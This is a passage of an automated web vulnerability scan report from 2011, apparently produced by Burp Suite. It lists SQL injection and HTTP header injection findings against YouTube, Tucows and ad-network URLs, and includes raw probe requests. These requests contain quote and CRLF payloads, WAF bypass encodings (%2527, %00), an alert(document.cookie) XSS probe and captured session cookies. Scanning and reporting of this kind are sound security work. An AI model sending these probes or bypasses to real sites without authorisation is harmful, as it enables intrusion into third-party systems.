<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhNa0xiQlNoRjdhcExFWmdaOFNIVVFBalJGVGkzZVpfRjdhSVNUMmVSWjRR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=ToX6xrflukg; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFdqOG5zd1o2TzFRbHg5QUlZeGpVb3hGTkVJSm50WVhWREpLUUNMS3NrUU9n -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=kWeqQ-wJhd4; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzhMeVpVZDN2ZGtQdF9FU0hoalNNX0VCeG9LX2oyRUFmTGNndWJydFUwR0J3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.23. http://www8.tucows.com/delivery/afr.php [OAVARS[aed03704] cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The OAVARS[aed03704] cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the OAVARS[aed03704] cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the OAVARS[aed03704] cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:15 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22726%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3778

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
our system with the leading and award-winning Registry Booster 2011 from Uniblue. Registry Booster 2011 is the safest and most trusted solution to clean and optimize your system, free it from registry errors and fragmented entries.
Through Advanced Error Detection Technology, Registry Booster 2011 automatically identifies missing, corrupt, or invalid items in your Windows registry and dramatically enhances performance and general stability
</p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:16 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:16 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.24. http://www8.tucows.com/delivery/afr.php [n parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /delivery/afr.php?n=aed03704'&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:48 GMT; path=/
Set-Cookie: OAVARS[aed03704\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3808

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704''&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:49 GMT; path=/
Set-Cookie: OAVARS[aed03704\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.25. http://www8.tucows.com/delivery/afr.php [n parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /delivery/afr.php?n=aed03704%00'&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:38 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3794

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704%00''&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:39 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3951

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

2. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6
d29cc9616d1
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e
d4b2f64cb5a

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&auid=&cn=defaultImpression&et=i&_cc=249349,123864,10361.,10361.10364.,1296767252,1&tpos=0&iw=&uxnw=11894&uxss=sg11948&uxct=1&init=1&cr=ae913%0d%0a56b335fe342 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767253.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g12288~1.1296769260.0,12720.1296769260.0,^";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296769250^11894^sg12288~sg11948^0~0^0.000000~55.000000,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296769245.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296769260.28800.0.0,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Location: ae913
56b335fe342

Content-Length: 0
Date: Thu, 03 Feb 2011 21:40:59 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f0b45525d5f4f58455e445a4a423208;path=/;httponly


2.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
